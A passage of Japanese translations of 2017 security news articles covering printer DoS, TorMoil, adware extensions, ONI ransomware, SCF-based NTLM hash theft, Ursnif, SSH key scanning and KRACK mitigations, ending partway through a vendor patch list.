     攻撃は、不正な形式のHTTP POSTリクエストを当該プリンタに送信することによって実行される。攻撃者は、サーバにアクセス不可能であり印刷できないことを意味する応答である一般的な500サーバ・エラーを受け取るだろう。
     「残念ながら、この問題に関してブラザーに再三連絡をとったにも拘わらず、ペンディングされているパッチはないようである。この問題を軽減するには、管理者は、彼らのデバイスに委ねることである」と、「厳密なアクセスコントロールを、ここに課し、ファイアーウォールと、アクセスを必要とする管理者にのみWebアクセスを制限するための類似のデバイスを使用することは、ここでの脅威を軽減する支援となるだろう。残念ながら、貧弱なアクセスコントロールが、よくありがちである」と、Trustwaveはステートメントで発言している。  さて、この問題は、パッチがされないままになるようである。Siglerは、アップデートがブラザーによって作成されたとしても、多分、手動で配備する必要があるだろうと発言している。これは、セキュリティに関して自動化されたメカニズムとアップデート機能を持っていない他の接続デバイスにも、ありがちなことである。Miraiのような他の例もあり、攻撃者は、DDoS攻撃で損害を与えるために、この問題を悪用するにはあまりに幸福すぎた。
     「一部の人々は、DoS攻撃を単なる妨害として片付けるが、この攻撃は、リソースを専有し、あらゆる組織の生産性を低下させることができる。この攻撃はまた、組織への個人的攻撃の一部としても使用される」と、「例えば、攻撃者は、このようにDoS攻撃を起動し、次に、この問題を修正するために呼ばれた『専門家』としてその組織に現れることができる。専門家に扮することは、攻撃者が決してリモートからアクセスできなかったITリソースに、直接物理的アクセスする事を可能にする」と、Trustwaveは発言している。


    TorMoil脆弱性は、Torブラウザユーザの実IPアドレスをリークする
    BleepingComputer : News>Security (2017/11/03)
     Tor Projectは、ユーザの実IPアドレスをリークする脆弱性を修正するために、MacとLinux上のTorブラウザに関するセキュリティアップデートをリリースした。
     この脆弱性は、We Are Segment(サイバーセキュリティと倫理的ハッキングに特化したイタリア企業)のCEOであるFilippo Cavallarinによって発見された。
     Cavallarinは、先週、Tor Projectにこの問題(彼によってコードネームTorMoilと名付けられた)を内密に通知した。Tor Project開発者は、修正をリリースするためにFirefoxチーム(TorブラウザはFirefoxをベースにしている)と共同作業した。
     本日、Torチームは、この脆弱性を解決したバージョン 7.0.9 をリリースした。Torブラウザ 7.0.9 は、MacとLinux上でのみ利用可能である。Windows上のTorブラウザは影響を受けない。

    IPリークは、"file://"リンクで発生していた

     Cavallarinによると、この問題は実際には、Firefoxがfile:// URL を取り扱う方法におけるFirefoxのバグである。この問題はFirefoxにとっては無害であるが、Torブラウザにおいては壊滅的である。
     「影響を受ける[Torブラウザ]ユーザが、特別に細工されたWebページに移動すると、そのオペレーティングシステムは、Torブラウザをバイパスして直接リモートホストに接続する」と、Cavallarinは発言している。
     そのページに直接接続することによって、Torブラウザは、Torが中継するネットワークを通過しないので、ユーザの現実世界のIPアドレスを晒すことになる。

    TorMoilはオンラインで未だに悪用されていない

     「我々は、この脆弱性がオンラインで悪用されていることを認識していない」と、Tor Projectは本日の声明中で発言している。それであるにも拘わらず、攻撃者はTorブラウザのバイナリをリバースエンジニアリングし、パッチされたコードを検出することができる。精通したプログラマは、大変簡単に、そのバグが発生する方法を理解し、そのバグを悪用するためのプログラムを作成することができる。
     大部分のLinuxユーザが影響を受けるが、Tor Projectチームは、Tails OSディストリビューション上でTorブラウザを実行しているLinuxユーザ、並びに、TorブラウザのSandbox化されたバージョン(未だアルファ ステージ)を活用しているユーザは、影響を受けないと発言している。
     開発者はまた、彼らがIPリークを修正するために配布したパッチが、唯一の解決策であると付け加えている(可能な限り早急にリークを停止するために急いで適用しなさい)。これで、file:// URL 機能は、Torブラウザのユーザに関して幾つかのシチュエーションでは破壊される可能性がある。Torブラウザの開発者によると、ユーザは、そのリンクを、新しいタブにドラッグ・ドロップすることで file:// URL を開くことが可能である。


    ChromeのImage Downloaderアドウェア拡張に注意せよ
    BleepingComputer : News>Security (2017/11/01)
     これは、Chrome Webストアから拡張をインストールする時に、誰もが注意すべき公共サービス情報である。殆どの拡張は、全く無害であるが、ストアにアップデートされ、長期間削除されない、不快で悪意ある拡張が益々一般的になり始めている。
     例えば、今日、私は、我々のマルウェア削除ヘルパーの一つであるAuraが、疑わしいと見做しているImage Downloader(これへのリンクは直ぐに排除された)と呼ばれる新しいChrome拡張について告げる。詳しい検証で、この拡張は、あなたが訪問しているWebサイトに広告を挿入し、あなたがそのサイトと相互作用すると、新しいタブで不快なサイトを開き、そして、検索エンジンの結果ページの先頭に広告を挿入するアドウェアである。
     あなたは、この拡張がどのように動作するかを説明するビデオを見ることができる。
     ブラウザが起動すると、この拡張は、適切に動作するために必要な設定情報をダウンロードするために二つのサイトに接続する。この情報は、次に、以下に示す広告を挿入するための拡張によって使用される。


    挿入された広告

     助言として、あなたが本当に必要な拡張だけをダウンロードし、それをインストールする前に、その拡張のパーミッションを常にチェックするようにしなさい。悪意ある拡張は、一般的に、あらゆるWebトラフィックを改竄するために全パーミッションを取得しようとする。これは大部分の拡張には必要のないものである。必ずセキュリティプログラムのアップデートをインストールしなさい。
     拡張を調べたい人々に関しては、HybridAnalysisVirusTotalに、拡張をアップロードしなさい。


    Bootkit身代金要求型マルウェアの悪漢共は、日本のBadRabbitセキュリティホールに飛び込んでいる
    The Register : Security (2017/10/31)
     身代金要求型マルウェアの新種は、明らかに日本で標的型攻撃のために使用されている。
     MBR-ONI(新しいBootkit身代金要求型マルウェア)は、その暗号化ルーチン用にDiskCryptorと呼ばれる合法でオープンソースのディスク暗号化ユーティリティの改竄されたバージョンに依存している。これは、先週Bad Rabbit身代金要求型マルウェアによって悪用されたものと同じツールである。
     ONIと新しく発見されたMBR-ONIは、身代金要求型マルウェアの全ての特徴を表に出しているが、このマルウェアが日本企業に対する標的型攻撃の証拠を隠すことを意味する有害なワイパーとして使用されていると、警備情報企業Cybereasonは認識している。

     我々は、ONI身代金要求型マルウェアが、精巧なハッキング操作を隠蔽するワイパーとして使用された可能性を疑っている。これらの標的型攻撃は、3から9ヶ月にわたって継続し、全ては、一度に数百のマシンを暗号化しようとする試みで終了した。
     セキュリティ侵害されたマシンで発見された法医学的遺物は、攻撃者が彼らの操作を隠蔽するための重大な試みを行ったことを示している。

     Cybereasonによると、MBR-ONIは、同じ一連の攻撃において、ONI(身代金要求型マルウェアの早期の株)と関連して使用されている。一緒に配備することはもちろん、不快な二つの株が「同じeMailアドレス」を共有することであると、研究者達は主張している。一方のマルウェアが、同じ目的を達成した時、同一の攻撃で身代金要求型マルウェアの二つの株を使用することは、Cybereasonと他の興味を持つオブザーバ達の双方にとって謎のままである。
     最新の攻撃は日本に特定されているが、身代金要求型マルウェアとワイパーに関連する標的型攻撃は、ここ数年、世界中で増加している。目立とうとする例としては、Saudi Aramco(【訳注】 サウジアラビア王国の国営石油会社), RasGas(【訳注】 カタールのドーハに本社を置くカタールガスに次いで世界で2番目の規模を持つ液化天然ガス供給会社)や他の標的にされた組織に対するShamoon攻撃が含まれる。
     最新の日本におけるこのマルウェアの攻撃は、兵器化されたOfficeドキュメント(最終的にAmmyy Admin RATを投下するように設計されている)を運ぶために、スピア型フィッシングeMail(【訳注】 全く同じ内容のメールを大量に不特定多数のアドレスに送り付けるのではなく、攻撃相手のことをよく研究し、ごく自然に感じられる件名や本文、添付ファイル名などが付される(ESETマルウェア情報局より))を装っているようである。マルウェアのペイロードは、eMail中のパスワードで保護された汚れたZIPファイルによって運ばれる。誰かがZIPファイルを開いた時に予期される特徴は、RATをダウンロードし実行するためのVBScriptを可能にするために、マクロを有効にするように誘導してくることである。
     Ammyy Adminと他のハッキングツールを使用することは、攻撃者が内部ネットワークを精密にマップし、認証を収穫し、横断的に移動し、最終的に重要な資源(標的のネットワークの完全制御を取得する前にドメインコントローラ(DC)を含む)をセキュリティ侵害する。Ammyy Adminは、しばしば悪意あるハッカーによって悪用されるものであるが、合法的なリモート管理ツールである。


    日本での身代金要求型マルウェア攻撃の段階

     Cybereasonは、ハッカー共がネットワークを介して拡散するために、他のツールとNSA(米国国家安全保障局)から流出したEternalBlue脆弱性悪用プログラムとを結合して使用していると発言している。データ損壊と攻撃の成功に伴うログの削除は、上述のことを証明するものではないが、Cybereasonは、MS17-010アップデート(2017年3月にリリースされた)が、セキュリティ侵害されたマシンにはインストールされていないことを発見している。更に、SMBv1は、セキュリティ侵害された環境にわたって有効にされたままであった。
     この攻撃の背後にいるハッカー共は、焦土作戦を実行中である。この身代金要求型マルウェアに加え、攻撃者共は、Windowsのイベントログを完全に消去する目的のバッチファイルを使用している。この行為は、インチキのグループポリシーによって攻撃の後の段階で適用される。更に、ONIバイナリファイルも、大規模なファイルの配列を暗号化するために、そのDomain Controllerからコピーされ実行される。
     Cybereasonによると、ONIはターゲットにしたネットワーク上の大部分のコンピュータに対して使用されるが、MBR-ONIは、一握りのエンドポイントに対してのみ使用されている。これらのエンドポイントは、重要な資源(アクティブ・ディレクトリ・サーバ、ファイル・サーバ等)である。
     日本攻撃は、2016年12月(それ以前の可能性も)以来2017年9月まで、少くとも9ヶ月間継続している。
     Cybereasonによると、ONIは、GlobeImposter身代金要求型マルウェアの変種とコードを共有しているようであり、幾つかのルーチンは同一である。MBR-ONIは、DiskCryptorからそのコードの大部分を借りている。コードの一部の改竄で、この攻撃は、合法のディスク暗号化ユーティリティを身代金要求型マルウェアや、有害なワイパーにさえ変換できることを示している。
     「ONIとMBR-ONIは、データの破壊によって進行中のハッキング操作を隠蔽するので、身代金要求型マルウェアよりワイパーにより近い目的を提供している」と、Cybereasonは結論している。

    Botnote

    ONIは、暗号化したファイルに追加するファイル拡張子に基づいてその名前を与えられた。名前のONIは、日本では“devil”(鬼)を意味する、そして、これは、脅迫文中に見出されるeMailアドレスに表示されてもいる。“Oninoy0ru”は、“Night of the Devil”(鬼の夜)と翻訳される。Cybereasonは、他のeMailアドレス(ユーザ名に文字列“ONI”が存在する)を含むONIの脅迫文の別のバージョンを監視している。


    ハッカーはユーザと対話することなく、Windowsログイン認証を盗むことができる
    BleepingComputer : News>Security (2017/10/27)
     Microsoftは、攻撃者がユーザと何ら対話することなく、Windows NTLMパスワードハッシュ(【訳注】 NTLMは、Windows NT 4.0以前のWindows NTシリーズのOSで標準的に使われていたネットワークログオンのためのユーザ認証方式。Windows2000からはデフォルトの認証方式にKerberos認証が採用されているが、Microsoftは、運用性向上のためにNTLMハッシュをケルベロス認証の実装に追加している。研究者によると、このような設計により、NTLMハッシュが既知の場合に攻撃者がドメインコントローラにケルベロス認証のチケットを発行させることが可能(e-Words、Wikipediaより))を盗むことを可能にする危険なハッキングに対して、最新バージョンのWindowsだけにパッチをあてた。
     このハックは簡単に実行でき、成功するために高度な技術的なスキルを必要としない。攻撃者が実行するために必要な唯一のことは、公開されているWindowsフォルダの内部に悪意あるSCFファイルを配置することである。
     このファイルが、そのフォルダ内部に配置されると、このファイルは不可解なバグのせいで実行され、そのターゲットのNTLMパスワードハッシュを収集し、攻撃者の設定サーバにそれを送信する。公共で利用できるソフトウェアを使用することは、攻撃者が、NTLMパスワードをクラックし、その後、そのユーザのコンピュータへのアクセスを取得することを可能にする。
     このようなハッキングは、犠牲者のネットワークへの直接接続を持つ攻撃者が、近くのシステムにアクセスを拡大することを可能にする。

    共有フォルダを持つ全てのコンピュータに脆弱性があるわけではない

     パスワードで保護されている共有フォルダ付きのコンピュータは安全である。これは、WindowsのDefaultのオプションなので、殆どのユーザは、この攻撃に対して脆弱ではない。
     それにも拘わらず、企業環境、学校、他の公共のネットワーク中のユーザは、しばしば便利だということだけでパスワード無しでフォルダを共有しているので、多くのシステムは攻撃に対して開かれている。


    共有オプション

    Windows 10とServer 2016だけパッチが利用可能である

     このハッキングは、アメリカ人のセキュリティ研究者Juan Diego(4月にこの問題をMicrosoftに通知した)によって発見された。
     Microsoftは、今月のMicrosoftの月例アップデート(パッチの火曜日)のADV170014セキュリティ・アドバイザリで、この攻撃ベクトルをパッチした。このパッチは、Windows 10とWindows Server 2016ユーザ用だけである。
     今迄のWindowsバージョンは、このレジストリの修正が、Windows Firewallの以前のバージョンと互換しないために、この攻撃に対して脆弱である。

    脆弱性への攻撃ルートは解明されていない

     Bleeping Computerとの会話で、ADV170014は、彼が発見したこのハッキングをブロックするが、そもそも、このハックが可能である理由を、Diegoは説明できなかった。
     この攻撃は、悪意あるSCFファイルを介して動作する。SCFは、Shell Command Fileの頭文字であり、大変限定されたWindows Explorerコマンド(Windows Explorerを開いたり、デスクトップを表示したりするような)の設定をサポートするファイルフォーマットである。我々全てが日常的に使用している"Show Desktop"ショートカットは、SCFファイルである。
     「この攻撃は、SCFファイルを脆弱性のあるフォルダにアップロードする必要があるだけである」と、DiegoはeMailで、ユーザとの対話を必要としないということを強調して、Bleeping Computerに告げた。
     SCFファイルに関連した今までの攻撃は、犠牲者がそのフォルダにアクセスした時だけに実行された。Diegoによって発見された今回は、SCFファイル内部に含まれる悪意あるコマンドは、SCFファイルが共有フォルダ内部にアップロードされると直ぐに実行される(ユーザが、そのファイルの内容の調査を待つ必要なしに)。
     これが発生した理由は、Diegoには不可解である。「この攻撃は自動化されている。これを引き起こす根本的な問題は、私には分からないままである」と、「これに関してMicrosoftは、大変隠したがっている」と、Diegoは発言している。

    Microsoftのパッチは、pass-the-hash攻撃を解決しようとしている

     Microsoftが配布したパッチは、実際には、Diegoが説明不可能とするSCF自動実行を修正するものではないが、pass-the-hash(ユーザのネットワークの外部にあるサーバとNTLMハッシュの自動共有。Diegoも、このハックで採用したテクニック)として知られる20年前の攻撃をパッチしようとしている。
    この問題は古い問題であり、しばしば、多くの種類のWindowsハックで使用されている。まさに今春、pass-the-hash攻撃は、ユーザ認証を盗むためにChromeとSCFファイルを結合させている。他の最近のpass-the-hash攻撃に関しては、2016年2015年で公開されている。
     Microsoftが配布したパッチは、攻撃者が、ローカルネットワークの外部に据え付けられているサーバーの承認を得るためにローカルユーザを欺くことを妨げる。
     Diegoが、彼の発見した攻撃をMicrosoftに通知したが、この修正された問題に関してMicrosoftから認められたのはドイツ人研究者Stefan Kanthak(彼もまた2017年3月に類似のバグを通知している)であった。
     pass-the-hash攻撃を悪用する多くの方法が存在することを仄めかしながら、「Microsoftは(しょっちゅう)下手糞な仕事を行う、今月公開されたアップデートは、私が通知した6つの異なる弱点のうちの二つしか閉じていない」と、Kanthakは、eMailでBleeping Computerに告げている。
     この長く続いているセキュリティホールを、現在Microsoftが閉じたというKanthakの判断に賛意を表しつつ、「私は、この脆弱性を悪用する別法を作業中である」と、Diegoも発言している。
     ADV170014は、オプショナルのパッチとして存在している。特にDiegoの危険なハックと、十中八九他のpass-the-hash攻撃もブロックすることが確認されているので、このアップデートをインストールすることは強く推奨される。Diegoのpass-the-hash変形攻撃を実地検証することは、彼のブログで可能である。


    URSNIFバンキング・トロイが日本で拡散している
    Kaspersky : ThreatPost (2017/10/26)
     バンキング・トロイUrsnifを蔓延させている背後の攻撃者達は、日本を、先月開始したスパムキャンペーンを介してマルウェアを配布するためのトップ・ターゲットの一つにしていた。
     数年間、Ursnif(もしくは、Gozi)は、北アメリカ、ヨーロッパ、オーストラリアと共に日本をターゲットにしてきた。しかし、最近のIBM X-Forceによるこのマルウェアの解析によると、ハッカー共は、日本で新しいターゲットと回避テクニックを含むUrsnifキャンペーンを増大させている。
     「Ursnifバンキング・トロイは、2016年の金融部門に於いて最も活動的なマルウェア・コードであった。そして、2017年も今迄、その優位性を維持している」と、「しかし、2017年に於いて最も人気のあるターゲットの一つは日本の銀行であり、これは、9月に始まった最新の2017年度第三四半期において、Ursnifのオペレータが最も活動的な場所である」と、木曜日にリリースされたS-Forceのレポートは述べている。
     最近のサンプルは、犯罪者グループが、もはや銀行や銀行認証情報だけをターゲットにしているわけではないことを示している。「銀行に加えて、日本でアクティブなUrsnifの変種は、ローカルWebメール、クラウド・ストレージ、仮想通貨交換所、eコマースサイトのユーザ認証情報もターゲットにしている」と、Limor Kessem(IBMのセキュリティ相談役であり、このレポートの著者)は記述している。
     Ursnifは2017年に発見された広範囲にわたる脅威である。当初ののターゲットは、英語圏の国々におけるオンライン・バンキング有線システムであった。これは、このトロイのコードが偶然漏洩した2010年に変更された。これは、Webインジェクション・テクニック機能を配備し、隠蔽された仮想ネットワーク・コンピューティング(Hvnc)を活用したUrsnif v2の開発を導いた。


    2017年における攻撃ボリュームあたりの拡散しているバンキング・トロイ ファミリー

     2010年の末にかけて、オリジナルのUrsnifは、ヨーロッパ、イギリス、アメリカの主要銀行をターゲットにしていた。2017年まで早送りすると、Ursnifは現在、北アメリカ、オーストラリア、日本のターゲットに追加して、ブルガリア、ポーランド、スペイン、チェコ共和国の銀行をターゲットにしている。
     Ursnifの最新のバージョンは、幾つかの悪意ある活動の能力(スクリプトベースのブラウザ操作、Webインジェクション、マン・イン・ザ・ブラウザ機能(【訳注】 プロキシ型トロイの木馬というマルウェアによってWebブラウザの通信を盗聴、改竄を行う攻撃(Weblioより))、フォームグラビング(【訳注】 様々なブラウザ中のWeb形式のデータを捕獲する方法(Weblioより))、スクリーンキャプチャ、吹き替え版ビデオ・グラビング、隠蔽されたVNCとSOCKSプロキシ(【訳注】 セキュリティを高めるために、イントラネットからインターネットへの外向き接続の際に プロキシサーバを仲介するネットワーク構成(富士通のサイトより))攻撃)がある。
     配布方法の観点から、Ursnifは、有害なスパム(malspam)と脆弱性悪用キットを使用してきた。
     日本での最近のキャンペーンでは、Ursnifはマルスパムを使用している。これは、日本に於いて提供されている金融サービスやペイメント・カードからであることを装うインチキの添付ファイル付きのeMailを含んでいる。別のマルスパムの変種は、JavaScriptを含む .zip ファイルのダウンロードを引き金とするHTMLリンクを配布している。このスクリプトは、Ursnifのペイロードを取ってくるPowerShellスクリプトを起動する。
     アンチ検出メカニズムと歩調を合わせて、X-Forceによって検証された殆どの最近の変種は、「ユーザが、悪意あるファイルを閉じた後にだけPowerShellを起動するマクロ回避テクニック」を使用していると、Kessemは説明し、「この方法は、このマルウェアがSandbox検出を回避することを支援する」と、彼女は発言している。
     Ursnifによって使用されてきた他の回避テクニックは、コマンド&コントロール コミュニケーションを隠蔽するためのTorネットワークを含んでいる。7月、Forcepointは、Ursnifによって使用されていた別のアンチSandboxテクニック(研究環境を示す赤い旗を振るマウスの動き)を検出した。Sandbox環境が検出されると、ブービートラップされた添付ファイルは、彼らのペイロードを配布しないだろう。
     何故、日本がターゲットなのか? 「日本において組織化されたサイバー犯罪の歴史は、ついこの前である」と、 「マルウェア移住の殆どの場合、十分な資金を持つサイバー犯罪者グループは、より簡単に稼げるお金、セキュリティが強固でない、および、バンキング・セッションの間に、彼らのスパム策略およびソーシャルエンジニアリングに、あまり慣れていないユーザにとっての意外性を捜している」と、Kessemは説明している。


    攻撃者は、SSHセキュリティ・コントロールの欠乏に関するレポートの後、SSH鍵のスキャンを開始
    BleepingComputer : News>Security (2017/10/19)
     犯罪者は、偶然に漏洩された証明書でWebサイトに侵入するために、オンラインサイトのSSH秘密鍵を含んでいるディレクトリを巨大スキャンニング中である。
     SSH認証は、従来のユーザ名-パスワード モデルや、鍵をベースとした認証を介して動作する。この文字列は、管理者が、RSA暗号化鍵のペア(公開鍵と秘密鍵)を生成することで動作する。
     秘密鍵は、オーナーが認証したいサーバー上に配置されるが、ユーザは、ローカルなSSH設定ファイルに秘密鍵を保存する。

    秘密鍵のスキャンは突然始まった

     Wordfence(米国に本拠を置くWordPressセキュリティ企業)は、昨晩、攻撃者達が、SSH秘密鍵を探している可能性を暗示するフォルダ名で、巨大なスキャンを行っていることに気がついた。
     攻撃者達は、"root," "ssh," "id_rsa"のような、用語もしくは、用語の組み合わせを含むWebディレクトリを探していた。今週以前にこの種のスキャンに関する活動は殆ど無かったので、このスキャンは突然発生したことになる。
     「ここ24時間、我々は、新たな攻撃者がSSH秘密鍵に関してWebサイトを巨大スキャンしていることを確認した」と、昨晩レポートを公開したWordfenceのCEO Mark Maunderは、発言している。
     「このグラフは、ここ48時間でのスキャン活動の巨大な上昇を示している」と、続けて「我々は、この活動の増加は、攻撃者が、秘密鍵に関して多少のスキャンニングの成果を上げたので、彼らが更に努力することを決めたと考えている。これは、一般的なバグ、もしくは、WordPressサイトのオーナーによって実行された操作ミスを示しているのかもしれない(秘密鍵は、それによって偶然公開される)。」と、Maunderは発言している。


    SSH秘密鍵のスキャン

    危険なSSH設定は、このスキャンの引き金になったとするレポート

     この突然の上昇は、Venafi(IDentity Protectionサービスのプロバイダ)によって、今週初めに公開されたレポートによっても説明される。
     この会社は、410 ITセキュリティ専門家の間での研究を実施し、「SSHセキュリティ・コントロールの欠乏が蔓延している」ことを発見した。

    鍵の研究は、以下を発見した:

    ✈ 応答者の61%が、SSHを管理する管理者の数を制限も監視もしていない。35%だけが、悪意に満ちたインサイダーの誤用が、組織を盲目にしたままにするので、SSHユーザに、彼らに認証されているキーの設定を禁止する方針を実行している。
    ✈ 応答者の90%は、SSH鍵全ての完全で正確な目録を持っていないので、鍵が盗まれたか否か、誤用されたか否か、あるいは、信用すべきではないのかを、判断する方法を持っていないと発言している。
    ✈ 応答者の丁度23%は、四半期もしくは、もっと頻繁に鍵を使いまわしている。40%は、全く鍵を使いまわしていないか、使い回しは偶にしかしないと発言してる。SSH鍵へのアクセスを取得した攻撃者達は、鍵が使い回されるまで、特権的アクセスを持続する。
    ✈ 応答者の51%は、彼らがSSH用の「ポートフォワーディングをしない」を実行していないと発言している。ポートフォワーディングは、システム間のファイアーウォールを効果的にバイパスすることをユーザに可能にするので、SSHにアクセスできるサイバー犯罪者は、ネットワークセグメントを越えて素早く回することができる。
    ✈ 応答者の54%は、SSH鍵が使用されるロケーションを制限していない。移動しないアプリケーションに関しては、特定のIPアドレスにSSHの使用を制限することで、サイバー犯罪者による、リモートからのセキュリティ侵害されたSSH鍵の使用を制限することができる。このようなバグを公に公開したり、レポートしたりすることは、しばしば、地下サイバー犯罪者(そして、彼らはセキュリティ専門家同等の情報セキュリティをテーマにしたサイトの熱心な読者である)の反応の引き金となる。

     Webサイトのオーナーは、彼らが公開サーバにSSH秘密鍵を偶然アップロードしているか否か、あるいは、SSH秘密鍵をGitやSVNレポジトリに収容したか否かチェックすることがアドバイスされている。SSH秘密鍵にアクセスするパスフレーズを設定することもまた、攻撃者が、この鍵を使用することを妨げる(たとえ、攻撃者が、どうにかしてそれを手に入れたとしても)。


    KRACK(Key Reinstallation Attack) WiFi攻撃から自分自身を守る方法
    Bitdefender : Hot For Security (2017/10/19)
     今週早く、ルーヴェン・カトリック大学(ベルギー)の研究者が、WPA2ワイアレス・コミュニケーション規格中に緊急のフローを発見した。これは、全てのWiFi接続デバイスに、攻撃に対する脆弱性が残ったままになっていたということである。そこで、我々は、Wi-Fi Alliance(【訳注】 無線LAN製品の普及促進を図ることを目的とした業界団体(Wikipediaより))が修正を用意するまで、ユーザが、リスクを軽減するために採用できる簡単なステップを提示する。
     我々が昨日書いたように、研究者Mathy Vanhoefは、「犠牲者の範疇にいる攻撃者は、KRACKを使用して、これらの弱点を悪用することができる」ことを確認している。
     攻撃は、platform-agnostic(プラットフォームにとらわれないことを意味している)であり、理論的には、最新の保護をされた全てのWiFiネットワークに対して動作するだろう。このフローを悪用する攻撃が未だ、記録されていないことは注目に値するが、後悔より安全であるほうが良い。
     Wi-Fi Allianceは、状況を改善するための計画を立案しているが、この脆弱性は、WPA2が完全にパッチされるまでの暫くの間、継続している。
     この部分に関して、United States Computer Emergency Readiness Team(CERT、米国コンピュータ緊急事態対策チーム)は、このニュースに対応するアドバイザリを公開し、影響を受ける既知の全てのハードウェアとソフトウェアのリストさえ公開した。Wi-Fi allianceと製品ベンダは、急いでパッチを用意しているので、あなたが実行できることを以下に掲げる。

    既に利用できる、あらゆるアップデートとパッチをインストールする

     あなたのベンダが、パッチを既に利用できるようにしているのであれば、それを入手しなさい。パッチの取得とインストールは簡単ではないかもしれないが、あなたのデータとプライバシーを大切に思うのであれば、パッチするための努力をしなければならない。一般的に、ルータは、ベンダのWebサイトを訪問し、パッチをダウンロードし、Webツールを介してルータにパッチを入力することで、手動でパッチする必要がある。

    AES暗号化を使用する

     AESとTKIP共にKRACK対して脆弱性がある。しかしながら、AESは、パケットの挿入に対する脆弱性がないので、それがAES(TKIPではない)で暗号化されている限り、ある程度の心の平安と共にWPA2を使用し続けることができる。

    HTTPSで安全にされ、且つ / もしくは VPNを使用しているWebサイトだけを訪問しなさい

     HTTPSは、その独自のセキュリティ・レイヤーを取り決めているので、HTTPS(TLS)で安全にされた全てのWebサイトは、理論的には訪問しても安全である。より大きな心の平安のためには、入出力の伝達の暗号化に信頼あるVPNサービスを使用しなさい。HTTPサイトは、KRACKだけでなく、一般的に安全ではない。

    可能なら、よりリスクの低いデバイスを使用する

     KRACKが明るみに出ると直ぐに、実際にWiFiを介して送受信する全てのデバイスに脆弱性が確認された。しかしながら、Vanhoefは、OSのバージョン6.0以降で稼働しているAndroidデバイスは、欠陥のあるWPA2を実装しているために、最も脆弱性があると発言している。この件が解決されるまでは、非Androidデバイスを使用したほうが良いだろう。もちろん、これは解決策ではないが、異なるOSを搭載している複数の電話とタブレットを二刀流で使用している人々に関しては、単純に「より安全」なオプションである。
     デスクトップに関しては、研究者たちは、Linuxが最も脆弱なオペレーティングシステムであることを発見したので、可能なら、取り敢えずもう一度、Windows PCかMacの使用を検討するように促している。

    公共のWiFiを回避し、家庭や仕事ではEthernetを使用する

     公共のWiFiホットスポットは、この時点で最も脆弱なので、できる限りそれらを回避しなさい。家庭と仕事場では、あなたのコンピュータが可能であるのなら、有線ネットワークを使用しなさい。これは、WiFiを介してWebに接続する代わりに、あなたのコンピュータにEthernetケーブルを接続することを意味している。

    Windowsをアップデートする

     あなたが、Windows PCのユーザであるのなら(我々の読者の殆どがそうだろうが)、Microsoftの10月のアップデートが、KRACKに対してWindows 10を保護している。Microsoftに準拠しているソフトウェアメーカーは、これをWindows Centralへのステートメントで確認している。

     「Microsoftは、10月10日にセキュリティアップデートをリリースした。Windows Updateを有効にし、セキュリティ アップデートを適用した顧客は、自動的に保護される。我々は、可能になると直ぐに顧客を保護するためにアップデートしたが、責任ある産業パートナーとして、我々は、他のベンダがアップデートを開発しリリースできるようになるまで、公開を差し控えた」と、Microsoftは発言している。

     あなたのPCが自動アップデートを有効にしているなら問題ないが、そうでないのであれば、Windows Updateを介してパッチを手動で入手する必要がある。我々は、あなたが、直ぐにこれを実行するよう提案する。
     (Windowsをアップデートすることは、可能性のある攻撃からWindowsデバイスだけを保護するのだということを思い出しなさい。あなたの他のデバイスは、依然として、パッチもしくは、上に列挙したステップを介して安全にする必要がある)

    Apple並びに他のOSのユーザに関して

     Appleは、報道機関に対して、KRACK用のパッチを含むiOS, macOS, watchOS, tvOSの新しいバージョンをベータテスト中であることを認めている。けれども、最終バージョンがリリースされる時期に関しては、何も発言されていない。一般的に、Appleは、そのプラットフォーム用のベータOSのテストに、少くとも2ヶ月をかけている。
     この部分に関して、Googleも、問題を認識し、直ぐにパッチを公開するだろうことを認めている。Linux供給元もまた、対応にあたっている(パッチは既に展開されていると発言している)。
     まさに、全ての人々が、彼らのベンダがアップデートを配備するまで、上述の一般的なヒントを押し付けられることになっている。
     いつもどおり、あなたの防御を更に強化するために信頼あるアンチウィルス ソリューションを稼働しなさい。ハッカーが成功裡にKRACK攻撃を配備し、攻撃者が、あなたを悪意ある、あるいは、不正なWebサイトにリダイレクトしようとした場合でも、あるいは、あなたのシステムに悪意あるファイルを投下しようとした場合でも、あなたは未だ、あなたの側にアンチマルウェア ソリューションを持っている。
     これで終わり。諸君、安全に!


    KRACK(Key Reinstallation Attack) WPA2脆弱性に関するファームウェアとドライバ・アップデートのリスト
    BleepingComputer : News>Security (2017/10/16)

    【訳者より】 このリストは、米国東部時間 2017年10月16日 17:25(日本時間、2017年10月17日 07:25)現在のものです。最新情報は、コチラを参照してください。

     多くの人が読んでいる、あるいは、直ぐに読むだろうが、WPA2ワイアレス・プロトコルにKrackと呼ばれる脆弱性が存在している。この脆弱性は、ワイアレス接続を盗聴し、マルウェアをインストールしたり、Webページをセキュリティ侵害するためにワイアレス ストリーム中にデータを挿入することを攻撃者に可能にするものである。
     あなた自身を保護するために、多くのWiFi製品ベンダは、彼らの製品のファームウェアやドライバのアップデートをリリースするだろう。ユーザは、自分自身を保護するためにアップデートが利用できるようになったら直ちに、ハードウェアをアップデートすることが強く提案されている。これは、ルータ・ファームウェアとワイアレス・ネットワークカード・ドライバを含む。
     この問題の手助けとなるように、私は、様々なWiFiベンダと、新しいドライバが利用できるか否かについて、現段階で分かっている情報のリストを作成した。この脆弱性は大変新しく、利用可能な情報が殆ど無いので、今後数日間、新しい情報があるか否か確認するために、このページをチェックするよう、あなたにアドバイスする。このページは、ベンダに接触して得た情報、CERT情報ページ、他のソースからの情報を含んでいる。

    情報が利用可能な企業

    Arch Linux
    Archは、wpa_supplicantとhostapd用のアップデートをリリースしている。パッチは、コチラコチラで発見できる。

    Amazon
    Amazon広報担当は、我々の質問に対して、「我々のどのデバイスがこの脆弱性を含んでいるのか検証作業中であり、必要なものにはパッチを発行するだろう」と、応答した。

    Apple
     AppleInsiderの記事によると

    会社を代表して話すことを認められていないApple内部の情報筋は、ハードウェア感受性を削除するためのパッチは、OSの現在の範囲の「直前の」ベータに含まれていた(月曜のバッチの前のリリースを意味する)とAppleInsiderに告げている。しかしながら、我々の情報源は、AirPortハードウェア(Time Machine, AirPort Extremeベース ステーション,AirPort Expressを含む)、は利用できるパッチを持っていないと、そして、それが進行中であるか否かも定かでないと指摘している。

    Aruba Networks
     パッチ情報は、コチラコチラで発見できる。FAQも同様にポストされている。

    Belkin, Linksys, Wemo
     BleepingComputerは、Belkinの対応に関する声明を受け取った。

